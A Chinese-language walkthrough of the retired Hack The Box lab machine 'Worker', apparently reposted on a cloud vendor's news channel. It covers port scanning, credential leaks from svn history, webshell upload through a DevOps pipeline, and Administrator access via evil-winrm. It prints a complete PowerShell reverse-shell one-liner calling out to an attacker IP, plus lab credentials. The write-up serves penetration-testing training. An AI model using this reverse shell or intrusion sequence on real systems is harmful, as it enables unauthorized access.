如何用HTB進行Worker滲透測試

如何用HTB進行Worker滲透測試，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

基礎信息

簡介：Hack The Box是一個在線滲透測試平臺。可以幫助你提升滲透測試技能和黑盒測試技能，平臺環境都是模擬的真實環境，有助于自己更好的適應在真實環境的滲透
描述：

注：因為是已經退役的靶機所以現在的ip地址與信息卡中的并不一致。

前言

本次演練使用kali系統按照滲透測試的過程進行操作，通過svn獲取網站的版本信息與用戶，通過管理界面上傳木馬文件或去shell，最終通過創建管道修改管理員密碼獲得root權限。

一、信息收集

1、靶機ip

ip地址為：10.129.2.29

2、靶機端口與服務

nmap -sV -A -O 10.129.2.29

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
3690/tcp open  svnserve Subversion

3、網站信息收集

進入80端口，沒有獲取到有用信息

使用diesearch進行目錄掃描，獲取的都是一些目前用不到的信息

使用svn查看已部署網站的早期版本

svn checkout svn://10.129.2.29
svn diff -r 2

獲取到了一個用戶與最新的網站名稱

用戶：nathen
密碼：wendel98
網站： http://devops.worker.htb
將該地址寫入hosts文件重新進行訪問

將獲得的賬號和密碼寫入進入頁面

二、漏洞探測與利用

經過研究我們可以利用這個賬號的權限來發布一些信息，并且這些信息可以為其他用戶所用，我們可以利用這個權限上傳一個木馬文件并獲取shell
操作如下：

建立新分支

進入新創建的分支

上傳木馬文件

之后與我的操作一樣

操作完成后進入該鏈接反彈shell，這個過程要快一點，要是操作太慢鏈接就會失效

反彈shell的鏈接如下

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

三、提權

1、獲取user.txt

獲取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在\svnrepos\www\conf目錄下發現密碼文件

經過枚舉我們獲得了可用的賬號與密碼
用戶：robisl
密碼：wolves11
使用evil-winrm進行強制登錄
鏈接：https://github.com/Hackplayers/evil-winrm
登錄成功獲取到user.txt

2、提權獲取root.txt

接下來我們進行使用robisl登錄管理界面，可以通過創建新的管道來更新管理員密碼

只保留其中的一部分

設置好之后運行

使用evil-winrm進行強制登錄獲取root權限

ruby evil-winrm.rb -i 10.129.2.29 -u Administrator -p HTBworkerDone!

獲取網站版本信息與用戶之后進入了管理界面，在管理界面耽誤了很長時間，因為不知道給頁面有和作用耽誤很長時間，中間反彈shell的時候一定盡量操作流暢迅速否則會反彈失敗，自己在面對陌生的系統時不能很好的進行理解與利用有待提高。

看完上述內容是否對您有幫助呢？如果還想對相關知識有進一步的了解或閱讀更多相關文章，請關注億速云行業資訊頻道，感謝您對億速云的支持。